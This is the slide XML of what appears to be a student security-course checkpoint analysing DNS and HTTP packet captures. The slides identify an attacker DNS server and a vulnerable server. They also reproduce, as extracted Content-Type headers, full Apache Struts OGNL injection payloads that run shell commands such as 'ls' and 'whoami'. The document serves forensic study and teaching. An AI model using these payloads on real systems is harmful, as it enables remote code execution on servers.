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8" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="262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7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DFCBE-6DB1-4B1B-ABB3-B63202E8D2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27F89-5F03-480E-8C39-BE7723C38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4A6B9-7556-400B-B4AC-433AB578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5D331-7D15-4DA4-9B6F-F19012534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30A0A-8960-4A73-8B9B-F8E284CD4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82A10-4392-4AD6-929E-227E4B3B4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A247C7-ACB2-4E0E-947E-8988FB3C9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AB833-3184-47A5-BCD6-9C53ACE79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3F833-8BC8-45EA-BFF4-903E11DA5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28BB2-8FD9-4424-8EFC-E18CCD35F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51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0B9A8D-1CA7-4961-BA18-89263A7A9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6AFE6-DCBD-431E-99D6-4B35487B7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024D0-0311-48D0-805E-85C27A02F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29561-9855-4E6C-9663-CE83B4D24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5B88F-4F71-430C-BC5E-4767A183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3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77E35-505C-4661-A350-D48332BDC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70C6E-F342-4085-9221-5AD8946E1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9BF7A-7D25-491C-B744-D0ABCF198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3326B-FE5C-41FB-A57A-2C06A95C1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8C87B-7262-41A1-984D-9A9F516C9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7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BCC57-6B97-4750-840C-2BEC36155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FC807-4BBA-43DA-BD60-91F14B89F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31A53-092A-49DD-A391-80F1BF035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2A654-A90A-44B0-89D2-053451B8F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49B6D-5E6E-419E-9334-9804D8E0C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56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2B782-8610-4B71-90D7-D32DE75E1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40769-AC98-4BF6-A45E-619E93F6F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E1DA5C-DA0E-42B7-940E-E41510EDB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90389-2245-405F-9E20-71C011FFE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CAB5F-B68F-4088-8F0A-1B7AE70DB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56F76-EAF7-447B-A724-796F5906D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23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C382D-B994-48A0-8D4F-9E4B26578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F2DA7-E357-4E79-948E-14D93DCAF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84071-8705-4799-8505-F7A64CE7F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2FB189-7903-4216-B49A-7154E16F4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3E4BF6-3478-4A51-B0E0-311602840B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80C5DD-4E94-4EB1-AC14-0485D50EA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4/13/20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95A404-6C0D-4DE9-BA53-8A44E6CED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2AA75B-2B1B-410F-84AE-A3A3FF256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18FBC-69EF-4DD9-A569-18FE7BEA9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C4B2D2-5DD7-4833-BF51-F3E697E78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4/13/20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D6132-210B-4CCA-8F36-457AF6D1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006A77-955F-4304-B865-89A9DB6C0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0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D2AAF-04D4-4E97-90BC-98A9334B1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4/13/20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3C425C-C440-4075-ACA5-C1D56B2B5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C4AAB-D376-4EBC-A9E4-D71362666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6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BF48-9894-41D6-882C-1DA7612CD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E3B81-8A03-4EC3-9688-4554E6B72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CC1B8-EDD4-4827-B8F9-DB74D76F4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4718D-9C3F-4FC8-B203-6B74BA38A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75A3E-4DC6-4D95-A3BD-912F1D88E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54BB3-8FC3-4B57-88F0-31B2C64B6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9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EF8A6-387D-47A4-BCDF-FEAA035CC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94CD6C-C2AF-453A-9CB0-F714B8AD52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F3F76D-857D-4B16-A2BC-374B310E1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A6D72-CBEB-4011-B246-606AB821B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E3350-AE6F-44D4-BEA6-2A35AC3AA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29DF1-7DC0-4B81-A968-7306E0800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95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C55863-BB60-4FF4-85D6-6B118FC88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78557-7DD6-4B28-BA8C-D3F3929D3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5A98B-4738-4F2D-90A0-F4C6B13AE1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88059-9AAA-48DC-89EE-5FBEEAFD7015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8DDC2-751E-4099-9875-B5427FD6A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B6D0F-00D3-413A-9770-DECD2ADBF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97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162.212.156.148/rk.k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58D29-D508-45F5-9FC4-04EE61C2DC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Mini-Project 3 Checkpoint 1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>ECE/CS 498DS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Spring 2020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99350-515F-46E8-B587-7C3FE28E32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Akhilesh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Somani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (somani4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gowtham </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kuntumalla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (gowtham4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manan Mehta (mananm2)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203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7AB6F-89A0-4FA8-B30D-66F589EB6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3125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Task 1 – DNS Traffic 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575F8B-7BD6-4ABB-96F6-03B242230721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1636326"/>
            <a:ext cx="8905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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a) Provide the IP address of the attacker-controlled DNS server: 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162.212.156.148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1752F6-8EB9-4A8F-90AE-C928C2E0ACE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2070998"/>
            <a:ext cx="8905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 (b)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Provide the IP address of the legitimate DNS server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.0.2.15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5F06A4-71EE-4E88-AD4C-123D6657C51F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2483647"/>
            <a:ext cx="414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2. Histogram of the length of DNS queries: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CFB115-6F15-4490-8CC3-40EF57787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514" y="2963387"/>
            <a:ext cx="4416902" cy="3463148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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0DE9126-2486-6948-8611-486327FD4A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788" y="2963386"/>
            <a:ext cx="4322722" cy="340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920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4AE09-0795-4ADD-AD9A-B34B3AE4F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789" y="197024"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Task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B5503-4181-4B53-893E-FCCEE467D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2587"/>
            <a:ext cx="955089" cy="5542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F2C8F6-6611-4E40-8611-99C12BBAD1CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503789" y="1248863"/>
            <a:ext cx="9793771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dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0.6.(a) Which http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file represents legitimate activity, and which represents attacker activity?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http.pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> represents attacker activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http2.pcap represents legitimate activity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0.6.(b) Are there any Content-Type headers in legitimate activity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file? If there are, list those Content-Type headers.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There are no Content-Type headers in the legitimate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (http2.pcap) file.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812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7AB6F-89A0-4FA8-B30D-66F589EB6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 – HTTP Traffic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86B5-C0CA-44C7-A49D-844D77E2F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878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1900" dirty="0"/>
              <a:t>Task 1. 1. a Report the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>UNIX timestamp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>of the first attempted scan on the vulnerable server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1521394903.610774</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Task 1. 1.b W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>IP address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>of the vulnerable server?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172.17.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="19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900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Task 1. 1.c What is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> of the vulnerable server?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8080</a:t>
            </a:r>
            <a:endParaRPr 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21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7AB6F-89A0-4FA8-B30D-66F589EB6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200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Task 1 – HTTP Traffic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86B5-C0CA-44C7-A49D-844D77E2F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1313656"/>
            <a:ext cx="10515600" cy="2025162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>2.a Provide a list of the Content-Type headers sent to the vulnerable server from the provided HTTP packet capture. For each Content-Type header, provide its length as well.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill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E83298B2-2071-48C7-A8DA-8F2A0FBCA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49576"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="742948" y="1946246"/>
          <a:ext cx="10706102" cy="4690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6788">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="398297121"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1189314">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1729151460"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="39312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content_type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357808"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="20619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application/x-www-form-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>urlencoded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6160381"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="32329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.multipart/form-data~${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>addHeader</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>("LOLOLOLOLOLPAYLOADWORKEDLOLOLOLOL",1330+7)}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6166069"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="827320"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/>
                        <a:t>%{(#_='multipart/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>formdata</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>').(#dm=@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognl.OgnlContext@DEFAULT_MEMBER_ACCESS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>).(#_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>memberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>?(#_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>memberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>container.getInstance</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil.getExcludedPackageNames</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().clear()).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil.getExcludedClasses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().clear()).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>context.setMemberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#dm)))).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>='ls').(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>iswin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=(@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>java.lang.System@getProperty</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>('os.name').</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>toLowerCase</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().contains('win'))).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmds</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>iswin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>?{'cmd.exe','/c',#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>}:{'/bin/bash','c',#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>})).(#p=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>newjava.lang.ProcessBuilder</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmds</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>p.redirectErrorStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(true)).(#process=#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>p.start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>()).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=(@org.apache.struts2.ServletActionContext@getResponse().</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>getOutputStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>())).(@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>org.apache.commons.io.IOUtils@copy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>process.getInputStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(),#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros.flush</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>())}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8262506"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39312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%{(#_='multipart/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>formdata</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>').(#dm=@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognl.OgnlContext@DEFAULT_MEMBER_ACCESS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>).(#_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>memberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>?(#_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>memberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>container.getInstance</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil.getExcludedPackageNames</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().clear()).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil.getExcludedClasses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().clear()).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>context.setMemberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#dm)))).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>='</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>whoami</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>').(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>iswin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=(@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>java.lang.System@getProperty</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>('os.name').</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>toLowerCase</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().contains('win'))).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmds</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>iswin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>?{'cmd.exe','/c',#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>}:{'/bin/bash',’c',#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>})).(#p=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>newjava.lang.ProcessBuilder</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>cmds</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>p.redirectErrorStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(true)).(#process=#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>p.start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>()).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=(@org.apache.struts2.ServletActionContext@getResponse().</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>getOutputStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>())).(@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>org.apache.commons.io.IOUtils@copy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>process.getInputStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(),#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros.flush</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>())}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715740"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39312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%{(#_='multipart/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>formdata</a:t>
                      </a:r>
